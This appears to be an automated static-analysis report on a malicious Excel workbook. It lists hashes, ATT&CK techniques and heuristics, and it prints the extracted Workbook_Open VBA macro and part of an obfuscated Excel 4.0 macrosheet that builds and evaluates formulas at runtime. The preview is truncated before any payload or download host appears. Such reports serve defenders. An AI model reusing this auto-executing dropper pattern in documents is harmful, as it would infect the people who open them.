Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d641549ad84e50fa…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 71.8 KB
Created: 2021-03-08 21:21:46 UTC
Authoring application: Microsoft Excel 16.0300
First seen: 2021-06-17
MD5: b40341e6bf1e6e36a3af2292f05e19b6
SHA-1: f8f0077a5b25bf08b69c5bad6dcb90643a780d36
SHA-256: d641549ad84e50fa81d091a3d6979ba8a197f81e9e99d0fa70b545be7c58de42
Risk score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution

The sample is an Excel document containing both VBA and Excel 4.0 (XLM) macros. The Workbook_Open VBA macro calls ExecuteExcel4Macro, which in turn executes the XLM function 'SecureDocument1!ItsFine()'. This function is known to be used to download and execute arbitrary code, indicating a downloader or dropper functionality. The critical heuristics for XLM macros and dangerous API usage confirm this malicious intent.

Heuristics (6)

  • Excel 4.0 macro sheet (1 sheet(s)) [critical, 1 related finding] OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
  • Dangerous XLM formula APIs: GOTO, FORMULA [critical] OOXML_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
  • VBA project inside OOXML [medium, 2 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Workbook_Open macro [high] OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    Extracted URLs (each labelled "In document text (OOXML body / shared strings)"):
      • http://schemas.openxmlformats.org/spreadsheetml/2006/main
      • http://schemas.microsoft.com/office/excel/2006/main
      • http://schemas.openxmlformats.org/officeDocument/2006/relationships
      • http://schemas.openxmlformats.org/markup-compatibility/2006
      • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac
      • http://schemas.microsoft.com/office/spreadsheetml/2014/revision
      • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2
      • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3
      • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6

Extracted artifacts (3)

Files carved from inside the sample during analysis. Each entry lists filename, kind, source and size.

Artifact: macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 714 bytes
  SHA-256: fcbc8996931ae687f6b0a75c941d9415f3ea35e1911235777a45ba998db530c8
  Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Sub Workbook_Open()
 ExecuteExcel4Macro ("SecureDocument1!ItsFine()")
End Sub
Artifact: vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: xl/vbaProject.bin
  Size: 12288 bytes
  SHA-256: 34ced3173ea47738d3c29004d34926a5da6c1393c9fe69c376cf529fc37eb712

Artifact: xlm_sheet_00.xml
  Kind: xlm-macrosheet
  Source: OOXML XLM macro sheet: xl/macrosheets/sheet1.xml
  Size: 79478 bytes
  SHA-256: 8620e070d18ddf59d55aa35b28e8f7e372e1ab279591a467dbd5d7e42187c618
  Preview (first 1,000 lines of the extracted script):
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{EE893509-E7EC-4ABC-AC04-97D1A1A279FF}"><dimension ref="A1:CB210"/><sheetViews><sheetView showFormulas="1" tabSelected="1" workbookViewId="0"><selection activeCell="C4" sqref="C4"/></sheetView></sheetViews><sheetFormatPr defaultColWidth="9.7109375" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="1" width="9.7109375" style="8"/><col min="2" max="20" width="9.7109375" style="6"/><col min="21" max="26" width="9.7109375" style="5"/><col min="27" max="27" width="9.7109375" style="9"/><col min="28" max="29" width="9.7109375" style="7"/><col min="30" max="40" width="9.7109375" style="8"/><col min="41" max="54" width="9.7109375" style="6"/><col min="55" max="55" width="9.7109375" style="8" customWidth="1"/><col min="56" max="56" width="51.85546875" style="8" hidden="1" customWidth="1"/><col min="57" max="57" width="9.7109375" style="8" hidden="1" customWidth="1"/><col min="58" max="58" width="1.140625" style="8" hidden="1" customWidth="1"/><col min="59" max="60" width="9.7109375" style="8" hidden="1" customWidth="1"/><col min="61" max="61" width="0.7109375" style="8" hidden="1" customWidth="1"/><col min="62" max="64" width="9.7109375" style="8" hidden="1" customWidth="1"/><col min="65" max="80" width="9.7109375" style="6" hidden="1" 
customWidth="1"/><col min="81" max="16384" width="9.7109375" style="6"/></cols><sheetData><row r="1" spans="1:63" x14ac:dyDescent="0.25"><c r="A1" s="11" t="e"><f>GOTO(A2)</f><v>#N/A</v></c><c r="U1" s="9" t="b"><f>SET.VALUE(V1,RANDBETWEEN(1,10))</f><v>1</v></c><c r="V1" s="9"><v>0</v></c><c r="W1" s="9" t="b"><f>FORMULA(V1,SecureDocument!B2)</f><v>1</v></c><c r="X1" s="9" t="b"><f>SET.VALUE(V1,"")</f><v>1</v></c><c r="AA1" s="9" t="b"><f>ALERT("Upadting Calcuations")</f><v>1</v></c><c r="AN1" s="8" t="s"><v>32</v></c><c r="BD1" s="7" t="b"><f>IF(SEARCH("Windows",EVALUATE(BH11&amp;BG13&amp;BH12&amp;BG11&amp;BK1&amp;BG12)),GOTO(BD2),FILE.CLOSE(FALSE))</f><v>1</v></c><c r="BE1" s="7"/><c r="BF1" s="7"/><c r="BG1" s="7"/><c r="BH1" s="7"/><c r="BI1" s="7"/><c r="BJ1" s="7"/><c r="BK1" s="7"><v>1</v></c></row><row r="2" spans="1:63" x14ac:dyDescent="0.25"><c r="A2" s="8" t="b"><f>GOTO(AA1)</f><v>1</v></c><c r="U2" s="9" t="b"><f t="shared" ref="U2:U65" si="0">SET.VALUE(V2,RANDBETWEEN(1,10))</f><v>1</v></c><c r="V2" s="9"><v>0</v></c><c r="W2" s="9" t="b"><f>FORMULA(V2,SecureDocument!B3)</f><v>1</v></c><c r="X2" s="9" t="b"><f t="shared" ref="X2:X65" si="1">SET.VALUE(V2,"")</f><v>1</v></c><c r="AA2" s="9" t="b"><f>GOTO(U1)</f><v>1</v></c><c r="BD2" s="7" t="b"><f>IF(EVALUATE(BH11&amp;BG13&amp;BH12&amp;BG11&amp;BK2&amp;BG12),FILE.CLOSE(FALSE),GOTO(BD3))</f><v>1</v></c><c r="BE2" s="7"/><c r="BF2" s="7"/><c r="BG2" s="7"/><c r="BH2" s="7"/><c r="BI2" s="7"/><c r="BJ2" s="7"/><c r="BK2" s="7"><v>31</v></c></row><row r="3" spans="1:63" x14ac:dyDescent="0.25"><c r="A3" s="8" t="e"><f>GOTO(StuffyStuff)</f><v>#N/A</v></c><c r="U3" s="9" t="b"><f t="shared" si="0"/><v>1</v></c><c r="V3" s="9"><v>0</v></c><c r="W3" s="9" t="b"><f>FORMULA(V3,SecureDocument!B4)</f><v>1</v></c><c r="X3" s="9" t="b"><f t="shared" si="1"/><v>1</v></c><c r="AL3" s="8" t="s"><v>28</v></c><c r="BD3" s="7" 
t="b"><f>IF(EVALUATE(BH11&amp;BG13&amp;BH13&amp;BG11&amp;BK3&amp;BG12),FILE.CLOSE(FALSE),GOTO(BD4))</f><v>1</v></c><c r="BE3" s="7"/><c r="BF3" s="7"/><c 
... (truncated)